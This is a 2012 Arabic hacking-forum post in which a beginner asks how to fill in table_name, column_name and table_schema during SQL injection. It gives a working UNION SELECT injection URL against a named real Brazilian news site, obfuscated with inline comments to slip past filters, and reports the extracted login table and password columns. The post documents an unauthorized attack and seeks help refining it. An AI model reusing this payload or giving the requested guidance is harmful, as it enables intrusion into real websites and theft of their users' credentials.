عرض مشاركة واحدة
قديم 05-25-2012, 03:29 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
qasim
 
الصورة الرمزية qasim
 

 

 
إحصائية العضو





qasim غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
qasim is on a distinguished road

افتراضي ارجوا ازالة هذا الغموض اثناء الحقن


السلام عليكم ايها الاحبه

السموحه اذا ثقلنا عليكم بالاسأله واعذرونا لاننا مبتدئين ومنكم نتعلم

انا عندي عدم وضوح بالنسبه عند الوصول الى المرحلة النهائيه لحقن اي موقع

بمعنى اني احصل لا اعلم ماذا ادخل في هذا الامر

concat(table_name,0x3a,column_name,0x3a,table_sche ma)

ماذا ادخل في table_name
column_name
table_schema

والاحظ احيانا بان البعض يحذف table_schema
ويكتفي فقط بالامر
concat(table_name,0x3a,column_name,

ارجوا التوضيح لاني والله اوصل الى هذه المرحله لكن اتلخب اي واحد اليوزر واي واحد اسم الباس ووين اعوضهم وشوو هو التيبل سكيما

ارجوا التوضيح بارك الله فيكم
لوكم مني دعوة عن ظهر قلب

مثال قبل قليل استطعت ان احقن هذا الموقع:

http://www.valorcontabil.com.br/supernews/?noticia=15 UNION /*!SELECT*/ 1,2,3,4,/*!concat*/(ID,0x3a,pass),6,7+from+supernews_login-- -

وحصلت بالنهايه

supernews_login:pass:valorcon_supern

supernews_login:ID:valorcon_supern

ولم افهم ماذا اضع بدل table_name , column_name , schema_name

انا هنا حذفت السكيما وتلخبطت بس بالنهايه طلع عندي الباس واليوزر لكن لا اعلم هل الطريقه صحيحه اما لا؟




hv[,h h.hgm i`h hgyl,q hekhx hgprk

   

رد مع اقتباس